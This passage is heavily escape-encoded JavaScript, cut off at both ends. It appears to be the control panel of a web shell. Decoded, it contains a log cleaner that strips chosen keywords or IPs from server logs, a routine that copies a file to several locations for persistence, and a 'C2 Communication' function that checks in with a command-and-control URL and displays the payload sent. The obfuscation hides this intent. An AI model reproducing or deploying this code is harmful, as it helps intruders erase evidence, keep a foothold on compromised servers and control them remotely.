xe2\x9d\214\40\x24\173\162\x65\163\77\56\155\x65\x73\163\x61\x67\x65\x20\x7c\174\x20\x27\x44\145\x63\x6f\x64\145\x20\x66\141\x69\x6c\145\x64\56\47\x7d\74\57\x70\x3e\140\73\xa\11\x9\x9\x9\x7d\12\x9\11\11\11\164\x68\x69\x73\56\164\157\x61\163\164\x28\x72\145\x73\x3f\56\155\x65\163\x73\x61\x67\145\40\174\174\x20\47\x44\x65\143\157\x64\x65\x20\146\x61\151\x6c\x65\x64\56\x27\x2c\40\x27\145\162\x72\157\x72\47\x29\x3b\12\11\x9\x9\175\xa\11\x9\x7d\x2c\xa\11\11\12\x9\x9\x2f\57\40\101\x64\x76\x61\156\x63\x65\x64\x20\x4c\x6f\x67\x20\x43\x6c\x65\x61\156\145\162\xa\11\x9\x61\x73\x79\x6e\x63\x20\x61\x64\166\141\x6e\x63\x65\x64\114\157\147\x43\x6c\145\x61\x6e\145\x72\50\x29\x20\x7b\xa\11\11\x9\x63\157\156\163\x74\x20\x6c\157\147\x50\x61\x74\x68\163\40\x3d\x20\x64\x6f\x63\x75\x6d\145\x6e\164\x2e\147\145\x74\x45\x6c\x65\155\145\156\164\102\171\x49\x64\50\47\x61\144\x76\141\x6e\x63\145\144\x2d\154\x6f\147\55\160\x61\164\150\163\47\51\x3f\56\166\141\154\x75\145\40\x7c\174\x20\47\47\73\xa\11\x9\11\x63\x6f\x6e\x73\x74\x20\153\145\171\167\157\162\144\163\40\x3d\x20\144\x6f\x63\x75\x6d\145\156\x74\56\x67\145\x74\105\154\x65\155\145\x6e\x74\x42\171\x49\x64\x28\47\x61\144\166\x61\x6e\143\145\144\x2d\x6c\x6f\x67\x2d\153\x65\171\x77\157\162\144\x73\47\x29\77\x2e\166\141\154\165\145\40\174\174\x20\47\47\73\12\x9\x9\x9\143\x6f\156\163\164\40\x62\141\x63\153\x75\160\40\x3d\x20\144\157\x63\165\155\x65\156\164\x2e\147\x65\164\x45\x6c\145\155\x65\156\x74\102\x79\x49\x64\x28\47\x61\144\x76\141\x6e\143\145\x64\55\x6c\x6f\x67\55\142\141\143\153\165\160\47\x29\77\56\x63\150\145\143\153\145\x64\x20\174\x7c\40\146\141\x6c\x73\145\x3b\12\11\11\11\12\11\x9\x9\x69\x66\40\x28\x21\x6b\145\171\167\157\162\x64\x73\x2e\164\x72\151\x6d\x28\x29\x29\40\173\12\11\11\x9\x9\x74\150\x69\x73\56\x74\x6f\141\x73\x74\x28\47\120\x6c\x65\141\163\x65\40\145\156\x74\x65\x72\x20\x6b\x65\x79\x77\157\x72\x64\x73\x2f\x49\120\x73\x20\x74\157\40\162\x65\155\157\166\x65\x2e\47\54\x20\47\x65\162\162\x6f\162\x27\x29\73\xa\11\11\x9\11\x72\x65\164\x75\162\156\x3b\12\x9\11\11\175\12\11\11\11\xa\x9\x9\x9\143\x6f\x6e\x73\164\x20\x72\145\x73\x75\154\x74\163\x45\x6c\x20\75\40\x64\x6f\143\x75\155\145\x6e\164\x2e\x67\x65\x74\105\x6c\145\155\145\x6e\x74\x42\171\111\x64\x28\x27\x61\144\x76\x61\x6e\143\145\144\55\x6c\x6f\x67\x2d\x63\x6c\x65\x61\156\145\x72\x2d\162\145\x73\x75\154\x74\163\47\x29\x3b\12\x9\11\11\x69\x66\40\x28\x72\145\x73\x75\154\x74\163\x45\x6c\51\x20\162\145\163\165\x6c\x74\x73\x45\x6c\56\x69\156\x6e\145\162\x48\x54\x4d\x4c\x20\x3d\x20\x27\x3c\160\x20\163\164\x79\x6c\x65\75\42\143\157\x6c\x6f\x72\x3a\x76\141\162\x28\55\55\x61\143\x63\x65\x6e\164\x2d\147\157\x6c\144\x29\73\42\x3e\103\154\145\141\156\151\x6e\x67\x20\x6c\x6f\147\163\56\x2e\x2e\x3c\x2f\160\76\47\73\xa\11\11\x9\xa\11\11\11\x63\x6f\156\163\164\40\162\x65\x73\x20\75\40\141\167\x61\x69\x74\40\164\150\x69\163\56\141\x70\x69\x28\x27\141\144\x76\x61\x6e\143\x65\144\137\x6c\157\147\137\143\x6c\145\x61\x6e\x65\162\47\54\x20\x7b\40\x6c\157\147\137\x70\141\x74\x68\163\72\x20\x6c\x6f\x67\120\141\164\x68\163\x2c\40\x6b\145\x79\x77\x6f\162\x64\163\72\x20\x6b\145\171\167\157\162\144\163\x2c\x20\x62\x61\143\x6b\165\160\x3a\40\x62\141\x63\153\x75\160\x20\x7d\x29\x3b\12\11\x9\x9\12\11\x9\x9\151\x66\x20\x28\x72\145\163\x20\x26\46\x20\x72\x65\163\x2e\163\x74\141\164\x75\163\x20\x3d\75\75\40\47\163\x75\143\143\x65\163\x73\47\51\40\x7b\xa\x9\x9\x9\x9\x6c\145\164\40\150\x74\x6d\x6c\40\75\40\x60\x3c\144\x69\166\40\163\x74\x79\154\145\75\x22\x70\141\144\x64\151\156\147\72\x31\65\x70\x78\73\40\142\x61\x63\153\147\162\157\x75\x6e\x64\72\166\x61\162\x28\x2d\55\x62\x67\55\x6c\151\x67\x68\164\51\x3b\x20\x62\x6f\x72\144\145\x72\55\x72\141\144\x69\x75\x73\72\66\160\x78\73\40\x6d\141\162\x67\x69\x6e\x2d\x62\x6f\x74\x74\x6f\155\x3a\61\162\145\155\x3b\x22\76\xa\11\11\11\11\x9\74\163\x74\x72\157\156\147\x3e\xe2\x9c\x85\x20\103\x6c\145\141\x6e\x65\144\40\44\173\x72\x65\x73\56\x74\157\x74\x61\x6c\137\x63\x6c\145\141\x6e\x65\x64\x7d\x20\154\157\x67\40\x66\x69\154\145\x28\x73\51\74\x2f\x73\x74\162\x6f\x6e\147\x3e\12\x9\x9\x9\11\74\57\x64\x69\166\76\x60\x3b\12\11\11\x9\11\12\x9\x9\x9\x9\x69\146\x20\x28\x72\x65\x73\56\x63\154\145\x61\x6e\145\144\x20\x26\x26\x20\162\x65\x73\x2e\x63\x6c\145\141\x6e\145\x64\56\x6c\145\x6e\147\x74\x68\x20\76\x20\x30\x29\40\173\12\x9\11\11\x9\x9\x68\x74\x6d\x6c\40\53\x3d\40\47\74\150\x34\x3e\x43\154\x65\x61\156\x65\144\x20\x46\151\154\145\x73\72\74\x2f\150\64\x3e\47\73\12\x9\11\x9\11\x9\x72\x65\x73\56\x63\x6c\x65\x61\x6e\x65\144\56\x66\x6f\x72\105\141\143\x68\50\x69\x74\x65\x6d\x20\x3d\76\40\x7b\12\x9\11\x9\11\11\11\x68\x74\x6d\154\x20\53\75\x20\x60\x3c\x64\x69\x76\40\163\x74\171\154\145\75\x22\160\141\144\144\151\156\x67\72\61\60\x70\x78\73\x20\142\x61\143\x6b\147\162\157\165\x6e\144\72\166\141\x72\x28\x2d\x2d\142\x67\55\x64\141\x72\153\51\73\x20\142\157\162\144\145\162\x2d\x72\x61\x64\151\165\x73\72\66\x70\170\73\40\x6d\141\162\x67\151\x6e\55\142\157\x74\164\157\x6d\72\60\56\x35\162\x65\x6d\x3b\x22\76\12\11\x9\x9\x9\x9\x9\x9\74\x73\164\162\157\156\x67\76\x24\x7b\164\x68\x69\163\56\145\163\x63\x61\160\145\x48\x74\155\x6c\x28\x69\x74\x65\x6d\56\x70\141\x74\x68\51\175\74\57\163\x74\162\x6f\x6e\x67\x3e\74\x62\162\x3e\xa\x9\11\x9\11\x9\x9\x9\x3c\x73\160\141\x6e\40\x73\164\171\154\145\75\42\143\x6f\154\157\x72\72\166\141\x72\50\x2d\55\x74\x65\170\x74\x2d\155\x65\x64\51\73\x22\x3e\x52\145\155\x6f\166\145\x64\72\x20\x24\173\151\x74\145\155\x2e\162\145\155\157\166\x65\144\x5f\154\x69\156\145\163\x7d\x20\x6c\151\x6e\145\x73\40\174\40\122\x65\x6d\x61\x69\x6e\x69\156\x67\72\40\44\173\151\x74\x65\x6d\x2e\x72\145\x6d\x61\x69\x6e\x69\156\x67\x5f\x6c\x69\156\145\x73\175\x20\x6c\x69\x6e\x65\x73\x3c\x2f\163\x70\x61\x6e\x3e\12\x9\11\x9\x9\x9\11\x3c\x2f\144\151\166\x3e\140\73\xa\11\11\11\11\x9\x7d\x29\73\xa\x9\11\11\x9\x7d\xa\11\11\x9\x9\xa\x9\11\x9\x9\151\146\x20\50\x72\x65\x73\56\145\x72\162\157\162\x73\40\46\46\40\x72\x65\x73\x2e\x65\162\162\157\162\163\x2e\x6c\x65\156\x67\x74\150\40\76\40\60\x29\40\x7b\xa\11\x9\x9\11\11\x68\164\x6d\154\40\53\75\x20\x27\74\150\64\40\163\164\171\x6c\145\x3d\42\143\157\x6c\x6f\x72\72\166\x61\162\x28\x2d\x2d\x61\x63\x63\x65\x6e\164\x2d\162\x65\x64\51\73\x20\x6d\141\162\x67\151\156\x2d\x74\x6f\160\x3a\x31\x72\145\x6d\73\x22\76\105\162\162\157\162\163\72\74\x2f\150\x34\x3e\x27\x3b\xa\x9\11\x9\11\11\x72\145\x73\56\145\x72\x72\x6f\162\x73\56\146\157\162\x45\141\143\150\50\x65\162\x72\x20\x3d\x3e\40\173\12\11\x9\11\x9\x9\11\x68\x74\x6d\x6c\40\53\x3d\40\140\74\160\x20\163\x74\171\x6c\145\x3d\x22\x63\157\154\x6f\162\x3a\166\141\x72\50\x2d\55\x61\x63\x63\x65\x6e\x74\x2d\x72\145\144\x29\x3b\x22\x3e\44\173\164\x68\x69\x73\x2e\145\x73\143\x61\160\145\x48\164\x6d\154\x28\145\x72\x72\51\175\74\57\x70\x3e\140\x3b\12\11\x9\x9\x9\x9\x7d\51\73\12\x9\x9\x9\11\175\12\11\x9\x9\11\12\x9\11\11\11\151\x66\x20\50\162\x65\163\165\154\164\163\105\154\x29\40\162\x65\163\165\154\x74\163\105\x6c\56\151\x6e\156\145\162\x48\x54\115\114\40\x3d\x20\x68\x74\155\x6c\x3b\xa\x9\x9\11\11\x74\150\151\163\56\164\x6f\141\x73\164\x28\x60\103\x6c\145\x61\x6e\145\144\x20\x24\x7b\x72\x65\163\56\x74\157\x74\141\x6c\x5f\x63\x6c\145\141\x6e\x65\144\175\40\154\x6f\147\40\x66\x69\x6c\145\x28\163\x29\x60\54\x20\x27\163\x75\x63\143\x65\x73\x73\47\x29\73\12\11\x9\11\x7d\40\x65\x6c\x73\x65\40\x7b\12\x9\x9\11\x9\x69\146\x20\x28\x72\x65\x73\165\154\x74\x73\105\x6c\51\x20\x72\145\x73\x75\154\x74\x73\105\154\x2e\x69\156\156\x65\x72\110\124\115\x4c\x20\x3d\40\x60\x3c\160\40\163\x74\x79\154\x65\x3d\x22\x63\x6f\154\157\162\x3a\166\141\162\50\55\55\x61\143\143\145\156\x74\55\162\145\x64\x29\x3b\42\x3e\xe2\235\x8c\40\44\173\162\145\x73\x3f\56\155\145\x73\x73\141\x67\145\40\x7c\x7c\40\47\x46\141\x69\x6c\145\144\40\x74\x6f\x20\143\x6c\x65\141\156\40\154\157\147\x73\x2e\47\175\x3c\57\x70\x3e\x60\x3b\12\x9\x9\11\x9\x74\x68\151\163\x2e\164\157\x61\x73\x74\50\x72\x65\163\x3f\56\x6d\145\163\163\141\x67\x65\40\174\x7c\40\47\x46\x61\151\x6c\145\144\x20\164\x6f\x20\143\x6c\145\141\156\x20\x6c\x6f\x67\x73\x2e\47\54\40\x27\x65\x72\162\x6f\162\x27\51\x3b\12\x9\x9\x9\175\12\x9\11\x7d\x2c\12\11\x9\xa\x9\11\x2f\57\40\115\x75\154\x74\151\55\114\x6f\x63\x61\164\x69\157\x6e\x20\x42\x61\143\153\165\160\12\x9\x9\141\163\171\156\x63\40\x6d\x75\154\x74\x69\114\157\x63\141\x74\x69\x6f\156\102\141\143\153\x75\160\50\x29\x20\x7b\xa\x9\11\x9\x63\157\156\x73\x74\x20\x73\157\165\162\x63\145\x46\151\154\x65\40\75\40\x64\x6f\x63\165\155\145\156\x74\x2e\147\x65\164\105\x6c\x65\155\145\156\x74\102\171\x49\x64\x28\x27\x6d\165\154\x74\151\x2d\x62\141\x63\x6b\165\x70\x2d\x73\157\x75\162\143\145\x27\x29\x3f\x2e\x76\x61\x6c\x75\x65\40\x7c\174\x20\x27\x27\73\xa\11\11\x9\x63\x6f\x6e\x73\x74\x20\x62\x61\143\153\x75\x70\x4c\x6f\143\141\164\x69\x6f\156\163\x20\75\x20\144\157\143\165\155\145\x6e\x74\x2e\147\x65\164\105\x6c\145\155\x65\x6e\164\x42\171\x49\x64\x28\x27\x6d\165\154\164\151\x2d\x62\x61\143\x6b\165\160\55\154\x6f\143\141\x74\151\157\x6e\x73\47\51\x3f\56\x76\x61\x6c\165\x65\40\x7c\174\x20\x27\47\73\12\11\x9\11\xa\x9\11\x9\151\x66\40\50\41\x73\157\165\x72\143\145\x46\151\x6c\x65\56\x74\162\151\155\x28\51\51\40\x7b\xa\x9\x9\x9\11\x74\x68\x69\163\x2e\164\157\141\x73\x74\50\47\123\157\165\162\143\145\x20\146\151\x6c\145\x20\151\x73\40\x72\145\x71\165\151\162\x65\x64\x2e\x27\54\40\47\145\162\162\157\x72\47\51\x3b\12\x9\x9\x9\11\x72\145\x74\165\162\x6e\73\12\x9\x9\x9\x7d\xa\x9\11\x9\xa\11\11\x9\x63\x6f\156\163\164\40\x72\145\x73\x75\154\164\163\105\x6c\40\75\x20\x64\x6f\143\165\x6d\x65\156\x74\56\x67\x65\164\x45\x6c\x65\x6d\x65\156\x74\102\171\111\x64\50\47\x6d\165\154\164\151\x2d\x62\x61\x63\153\165\x70\55\162\x65\x73\x75\x6c\164\163\47\51\x3b\12\x9\x9\x9\151\146\40\x28\162\145\163\165\x6c\x74\x73\x45\x6c\x29\40\162\145\x73\165\x6c\x74\x73\x45\154\56\151\x6e\156\145\162\x48\124\x4d\x4c\x20\x3d\40\x27\x3c\160\40\163\x74\x79\154\145\75\42\143\x6f\154\157\162\72\166\141\162\x28\55\55\141\x63\143\x65\156\x74\x2d\x67\157\x6c\x64\51\x3b\42\x3e\103\x72\x65\141\x74\151\156\x67\40\x62\x61\x63\x6b\165\160\x73\x2e\x2e\x2e\x3c\57\160\76\x27\73\xa\x9\11\x9\xa\x9\11\x9\143\x6f\156\163\x74\40\162\x65\163\x20\75\x20\141\x77\x61\x69\164\40\x74\x68\x69\163\x2e\x61\x70\151\x28\47\x6d\x75\154\164\x69\137\x6c\x6f\143\141\164\151\x6f\x6e\137\142\x61\x63\153\165\x70\47\x2c\x20\173\x20\163\157\x75\x72\x63\x65\x5f\x66\x69\x6c\x65\72\x20\x73\x6f\165\x72\x63\145\106\x69\x6c\145\x2c\40\x62\x61\x63\x6b\165\160\x5f\x6c\157\x63\141\164\x69\x6f\156\163\72\40\142\141\x63\x6b\165\160\x4c\x6f\x63\141\164\151\x6f\156\x73\40\175\51\73\12\x9\11\x9\xa\x9\x9\11\151\x66\40\x28\162\145\163\x20\x26\46\x20\162\145\163\56\x73\164\141\164\165\163\x20\x3d\x3d\x3d\x20\47\163\165\143\143\145\163\163\x27\51\40\x7b\12\x9\11\11\x9\x6c\x65\x74\40\x68\164\x6d\x6c\40\75\x20\x60\74\144\151\x76\40\x73\x74\171\154\x65\75\x22\x70\141\x64\x64\x69\156\147\72\61\x35\160\x78\73\40\x62\x61\143\x6b\147\162\157\x75\x6e\144\72\166\x61\x72\50\x2d\55\142\x67\55\x6c\151\x67\150\x74\x29\x3b\40\142\x6f\x72\x64\x65\162\x2d\162\x61\144\151\165\163\x3a\x36\x70\x78\73\40\x6d\x61\x72\x67\151\156\55\x62\x6f\164\164\157\155\x3a\61\162\145\155\x3b\x22\x3e\12\11\11\x9\11\x9\x3c\x73\164\162\157\x6e\x67\76\342\x9c\x85\40\123\x75\x63\143\x65\163\x73\x66\165\154\x6c\171\40\x62\141\143\x6b\145\144\x20\x75\x70\40\164\x6f\40\44\173\162\145\163\56\163\165\x63\x63\145\x73\163\137\143\x6f\165\x6e\164\x7d\x2f\44\x7b\x72\x65\163\56\164\x6f\x74\x61\154\175\x20\154\x6f\x63\141\164\x69\x6f\x6e\50\x73\x29\x3c\x2f\163\164\x72\157\x6e\x67\x3e\12\11\11\x9\x9\x3c\57\x64\151\x76\x3e\x60\x3b\12\11\11\x9\x9\12\x9\x9\11\11\x69\146\40\x28\x72\x65\x73\56\x62\141\143\x6b\x65\x64\x5f\165\160\40\x26\46\40\162\145\163\56\x62\x61\x63\153\145\144\137\165\160\x2e\154\145\x6e\x67\x74\x68\x20\76\40\x30\x29\x20\173\12\x9\x9\x9\x9\11\150\164\155\x6c\x20\x2b\x3d\x20\x27\74\x68\64\76\x42\x61\143\153\x75\160\40\x4c\x6f\143\x61\164\151\x6f\156\163\72\x3c\x2f\150\64\76\x27\73\xa\11\11\11\11\x9\x72\x65\163\x2e\x62\141\x63\153\145\x64\137\x75\x70\x2e\146\x6f\x72\x45\x61\143\150\x28\x6c\157\x63\x20\75\76\40\173\12\11\11\11\11\x9\x9\150\164\x6d\154\x20\53\75\x20\140\74\x64\x69\166\x20\x73\x74\x79\154\145\75\42\x70\141\x64\x64\151\156\x67\72\x31\x30\x70\x78\x3b\40\142\x61\x63\x6b\x67\x72\x6f\165\x6e\x64\72\166\141\x72\x28\55\55\142\147\55\144\x61\162\x6b\51\x3b\40\142\x6f\x72\x64\x65\162\x2d\x72\141\144\151\x75\163\x3a\x36\x70\x78\x3b\x20\155\141\x72\147\x69\x6e\55\x62\157\x74\x74\x6f\155\72\x30\56\65\162\145\x6d\73\x20\x66\x6f\x6e\164\x2d\146\141\155\x69\x6c\x79\x3a\155\157\x6e\x6f\163\x70\x61\143\145\x3b\42\x3e\12\11\11\11\x9\x9\11\x9\342\x9c\x85\40\44\x7b\164\150\x69\163\56\145\163\143\x61\160\x65\x48\164\x6d\154\x28\x6c\x6f\143\51\175\12\11\11\x9\x9\11\x9\74\x2f\x64\x69\x76\x3e\140\73\xa\x9\11\11\11\x9\x7d\x29\x3b\12\x9\x9\11\x9\x7d\xa\x9\11\x9\11\12\11\11\x9\x9\x69\x66\40\x28\162\145\163\56\146\141\151\x6c\145\x64\x20\46\x26\x20\162\145\163\56\146\x61\x69\x6c\x65\x64\56\154\145\156\147\x74\150\x20\76\x20\60\x29\x20\x7b\12\11\11\11\x9\x9\150\164\155\154\x20\53\x3d\x20\x27\x3c\x68\x34\40\x73\x74\x79\154\x65\75\42\143\157\154\157\x72\72\x76\141\x72\x28\x2d\55\141\143\143\145\156\164\55\162\145\x64\x29\x3b\40\155\x61\x72\x67\151\156\x2d\164\157\x70\72\x31\x72\x65\x6d\x3b\x22\76\x46\x61\151\154\145\144\40\x4c\x6f\x63\141\x74\x69\x6f\x6e\x73\x3a\74\x2f\x68\64\x3e\x27\x3b\12\x9\11\x9\x9\11\162\145\x73\56\146\141\x69\x6c\145\144\x2e\146\157\162\x45\141\143\x68\x28\154\157\143\40\75\x3e\x20\173\xa\x9\11\x9\11\11\11\150\164\x6d\154\40\x2b\x3d\40\x60\74\x64\x69\x76\40\x73\x74\171\154\145\x3d\42\160\x61\144\x64\x69\156\x67\x3a\x31\60\160\x78\73\40\142\x61\143\x6b\x67\x72\157\165\x6e\144\x3a\x76\141\162\50\x2d\55\x62\147\x2d\144\141\162\x6b\x29\x3b\x20\x62\157\x72\x64\x65\162\x2d\x72\x61\x64\151\x75\x73\x3a\x36\x70\x78\73\x20\x6d\x61\x72\147\151\156\x2d\142\x6f\x74\x74\x6f\155\72\60\56\x35\x72\x65\155\x3b\40\146\x6f\x6e\164\x2d\x66\141\155\x69\x6c\x79\72\x6d\x6f\x6e\157\x73\x70\141\143\145\73\x20\x63\x6f\154\157\x72\x3a\166\141\x72\50\55\55\x61\143\x63\145\x6e\x74\55\x72\x65\x64\51\x3b\x22\76\12\x9\11\11\11\11\11\11\342\x9d\x8c\40\x24\173\164\x68\151\x73\56\x65\163\x63\141\x70\145\110\x74\155\154\x28\x6c\x6f\x63\x29\175\12\11\x9\x9\x9\11\11\74\57\x64\x69\x76\x3e\140\73\12\x9\11\11\x9\11\x7d\x29\x3b\12\x9\x9\11\x9\x7d\xa\x9\x9\x9\x9\xa\x9\11\11\x9\151\146\x20\x28\x72\145\x73\165\x6c\164\x73\105\x6c\x29\40\162\x65\x73\165\x6c\x74\163\105\x6c\x2e\x69\156\x6e\x65\x72\110\124\115\114\40\x3d\x20\150\164\x6d\154\x3b\xa\x9\x9\x9\x9\164\x68\151\163\56\164\x6f\x61\163\164\50\x60\x42\141\143\153\145\x64\40\165\160\40\164\x6f\40\44\173\162\145\163\x2e\163\x75\143\143\145\x73\163\137\x63\x6f\165\156\164\x7d\x20\x6c\157\143\x61\164\x69\157\x6e\x28\163\51\140\54\40\x27\x73\x75\x63\x63\x65\x73\x73\x27\51\x3b\12\x9\x9\11\175\x20\x65\x6c\163\x65\40\x7b\xa\x9\x9\x9\11\151\146\40\50\162\145\163\x75\x6c\x74\x73\105\154\51\x20\162\145\163\165\154\164\163\105\154\x2e\x69\x6e\156\x65\x72\110\124\115\114\x20\75\40\x60\74\160\40\163\x74\171\x6c\x65\x3d\42\143\x6f\154\x6f\x72\x3a\x76\141\x72\50\55\55\141\143\x63\145\x6e\x74\x2d\162\x65\144\51\73\42\76\342\x9d\x8c\40\44\x7b\162\x65\x73\x3f\56\155\x65\x73\163\x61\147\x65\x20\174\x7c\40\x27\x46\141\x69\x6c\145\144\40\164\157\40\x63\162\145\x61\164\x65\40\142\x61\143\x6b\165\x70\x73\x2e\x27\x7d\74\57\x70\x3e\140\73\12\11\x9\11\11\164\150\151\x73\56\164\157\141\x73\x74\50\162\x65\x73\77\x2e\x6d\145\163\163\141\147\x65\x20\x7c\x7c\x20\47\106\141\x69\154\145\144\40\164\x6f\40\143\162\x65\x61\164\145\40\x62\x61\143\153\x75\160\163\x2e\x27\54\40\47\145\162\x72\x6f\162\x27\x29\x3b\xa\x9\11\x9\x7d\xa\x9\x9\x7d\54\xa\x9\11\xa\11\11\x2f\57\x20\x43\x32\x20\x43\157\155\155\165\x6e\x69\143\x61\x74\151\157\x6e\xa\11\x9\141\x73\171\x6e\x63\x20\x63\62\x43\157\x6d\x6d\165\x6e\x69\143\141\x74\145\50\51\40\x7b\xa\x9\11\x9\x63\x6f\x6e\x73\x74\x20\143\x32\125\162\154\x20\x3d\40\x64\157\143\165\155\145\156\164\56\147\x65\x74\x45\x6c\x65\155\145\x6e\x74\102\171\111\x64\x28\x27\x63\x32\55\x75\x72\x6c\x27\51\77\x2e\166\x61\x6c\165\145\40\x7c\x7c\40\x27\x27\73\12\x9\x9\x9\x63\157\156\x73\164\40\141\143\x74\x69\x6f\x6e\40\75\x20\x64\157\x63\x75\155\145\156\164\x2e\147\x65\x74\x45\154\x65\155\145\x6e\164\102\171\x49\x64\x28\47\143\x32\x2d\x61\143\164\x69\x6f\156\47\51\x3f\x2e\x76\141\x6c\165\x65\x20\174\174\40\47\x63\150\145\143\153\x69\156\47\73\12\x9\x9\11\143\x6f\156\163\164\40\144\141\x74\x61\40\x3d\x20\x64\157\143\x75\155\x65\156\x74\56\x67\145\164\105\154\145\155\x65\x6e\164\102\171\x49\144\50\x27\143\62\x2d\x64\x61\x74\x61\47\x29\77\x2e\166\141\154\165\145\x20\174\174\x20\x27\47\73\12\x9\11\x9\12\x9\x9\x9\x69\146\x20\50\41\x63\x32\125\162\x6c\x2e\164\162\x69\x6d\50\51\51\x20\173\12\x9\11\x9\11\164\x68\151\x73\x2e\x74\x6f\141\x73\164\50\x27\x43\62\40\125\x52\114\x20\151\x73\x20\x72\x65\x71\165\151\162\145\144\56\47\x2c\x20\47\145\x72\x72\157\x72\47\51\x3b\12\11\x9\11\x9\x72\x65\x74\x75\x72\x6e\73\xa\x9\11\11\x7d\12\x9\x9\11\12\x9\x9\x9\x63\x6f\x6e\163\164\40\x72\145\163\x75\154\164\x73\105\154\40\75\x20\x64\x6f\143\165\155\x65\x6e\x74\x2e\x67\145\x74\x45\x6c\145\x6d\x65\x6e\x74\x42\171\111\x64\x28\47\x63\x32\55\x72\145\x73\165\x6c\x74\163\x27\x29\73\xa\x9\11\x9\x69\x66\40\50\162\x65\x73\165\154\x74\x73\x45\x6c\x29\x20\x72\145\163\165\x6c\x74\x73\105\154\x2e\x69\156\156\145\x72\110\x54\115\114\x20\x3d\x20\x27\x3c\160\x20\x73\164\x79\x6c\x65\x3d\42\x63\157\154\157\x72\x3a\166\x61\x72\50\x2d\x2d\141\x63\x63\x65\156\164\55\x67\157\x6c\x64\51\73\x22\x3e\103\157\155\x6d\165\156\x69\x63\x61\164\151\156\x67\x20\167\151\164\150\x20\x43\x32\56\x2e\56\x3c\57\x70\x3e\x27\x3b\12\11\x9\11\xa\x9\11\11\143\x6f\156\x73\x74\40\x72\x65\163\x20\x3d\x20\141\x77\x61\x69\x74\x20\164\x68\151\163\x2e\x61\x70\151\50\47\x63\x32\x5f\143\157\155\155\165\156\151\143\x61\164\145\x27\x2c\40\x7b\40\x63\62\x5f\x75\x72\x6c\72\40\143\x32\x55\162\x6c\54\x20\141\x63\164\151\x6f\156\x3a\40\x61\x63\x74\151\x6f\x6e\54\40\144\x61\x74\x61\x3a\40\x64\x61\164\141\40\175\x29\73\12\11\11\x9\xa\x9\x9\x9\x69\146\40\x28\x72\x65\x73\40\46\46\x20\162\145\163\56\163\164\141\164\165\x73\40\x3d\75\x3d\x20\47\x73\x75\143\143\x65\163\x73\47\51\x20\x7b\12\11\x9\11\x9\154\x65\x74\x20\150\164\x6d\x6c\40\x3d\40\140\x3c\144\x69\x76\x20\163\164\171\154\145\x3d\42\x70\x61\x64\144\151\x6e\x67\72\61\65\x70\x78\73\40\x62\x61\143\x6b\x67\x72\157\x75\x6e\144\72\166\x61\x72\50\x2d\x2d\142\x67\x2d\154\151\x67\x68\164\51\x3b\x20\142\157\162\144\145\x72\x2d\162\x61\144\x69\x75\x73\72\66\x70\x78\73\x20\155\141\x72\147\151\x6e\x2d\142\x6f\164\164\x6f\x6d\x3a\61\162\145\155\x3b\x22\76\xa\x9\11\11\x9\11\x3c\163\x74\x72\x6f\x6e\147\x3e\xe2\234\x85\x20\x43\157\x6d\155\165\156\151\143\x61\x74\x69\x6f\156\40\163\x75\143\143\x65\x73\163\146\165\154\40\50\x48\x54\x54\x50\40\x24\x7b\162\145\163\56\150\164\164\x70\x5f\143\157\x64\x65\175\x29\74\57\x73\164\x72\x6f\156\x67\76\12\x9\11\11\x9\74\x2f\x64\x69\x76\76\xa\x9\x9\x9\x9\74\150\64\x3e\122\145\163\160\157\x6e\163\145\x3a\74\x2f\x68\64\76\12\x9\x9\11\x9\x3c\x70\162\x65\40\x63\154\141\x73\163\75\x22\x6f\165\164\160\x75\164\55\x62\157\x78\42\x20\x73\x74\171\x6c\145\x3d\42\x6d\x61\170\55\x68\145\x69\x67\x68\164\72\x34\60\x30\x70\170\x3b\40\x6f\x76\145\162\146\x6c\x6f\x77\x2d\171\x3a\x61\165\164\157\73\42\76\x24\173\x74\x68\x69\x73\x2e\x65\163\143\141\160\145\110\x74\x6d\154\x28\x72\x65\163\56\x72\x65\163\x70\157\x6e\163\x65\51\x7d\74\x2f\x70\x72\x65\76\12\x9\11\11\x9\x3c\x68\64\x20\x73\x74\x79\154\145\75\x22\155\141\x72\x67\x69\x6e\55\164\x6f\x70\x3a\x31\162\145\x6d\x3b\x22\x3e\120\141\x79\x6c\x6f\141\x64\40\123\145\x6e\x74\72\74\57\x68\x34\76\xa\x9\x9\11\11\x3c\160\162\x65\x20\x63\154\141\x73\163\75\42\157\165\164\160\165\164\55\142\x6f\170\42\40\x73\164\x79\x6c\145\x3d\x22\x6d\x61\x78\x2d\x68\145\x69\x67\x68\x74\72\x33\60\60\160\170\73\40\157\x76\x65\x72\x66\x6c\157\x77\x2d\x79\72\x61\165\x74\x6f\x3b\x22\x3e\x24\173\112\x53\x4f\x4e\x2e\163\164\162\x69\156\x67\151\x66\x79\50\162\145\x73\56\x70\x61\x79\x6c\157\x61\144\x5f\163\x65\x6e\164\x2c\40\156\165\154\x6c\x2c\x20\62\51\x7d\74\x2f\160\162\145\76\x60\x3b\12\x9\11\11\x9\12\x9\11\11\11\151\x66\40\x28\x72\145\x73\x75\154\164\163\105\154\51\x20\162\145\163\x75\154\164\163\105\154\56\x69\x6e\156\145\162\110\124\x4d\114\x20\x3d\x20\150\164\x6d\154\x3b\xa\11\11\11\x9\x74\150\x69\x73\56\x74\x6f\141\163\164\50\x27\103\x32\40\143\x6f\155\x6d\x75\x6e\151\x63\x61\x74\x69\157\x6e\40\163\x75\143\x63\145\x73\163\x66\165\x6c\x21\47\54\40\47\x73\x75\143\x63\x65\x73\163\47\x29\73\12\x9\x9\11\x7d\40\x65\x6c\163\145\x20\173\12\x9\x9\11\11\x69\x66\x20\x28\162\145\x73\165\154\164\163\x45\x6c\51\40\162\145\163\x75\154\x74\x73\105\154\x2e\151\x6e\156\x65\162\x48\x54\115\x4c\40\x3d\40\x60\x3c\160\x20\x73\x74\171\154\145\x3d\42\x63\x6f\154\x6f\x72\x3a\x76\141\x72\x28\x2d\55\141\143\143\145\156\x74\x2d\162\145\x64\51\x3b\x22\76\342\235\214\40\x24\173\162\x65\163\x3f\x2e\155\x65\163\x73\141\x67\x65\x20\174\174\x20\x27\103\62\x20\x63\x6f\x6d\155\165\156\151\143\x61\164\x69\157\x6e\x20\146\x61\151\154\x65\x64\56\x27\175\74\x2f\x70\x3e\140\x3b\xa\x9\x9\11\x9\164\150\x69\163\56\x74\x6f\x61\x73\164\x28\162\145\163\77\x2e\155\145\163\x73\x61\x67\x65\40\x7c\174\40\47\103\62\40\x63\157\155\x6d\165\x6e\x69\x63\x61\164\x69\157\x6e\x20\x66\x61\x69\x6c\x65\144\56\47\x2c\40\47\145\x72\162\157\x72\47\x29\73\12\11\x9\11\x7d\12\11\x9\175\x2c\xa\11\11\xa\x9\11\x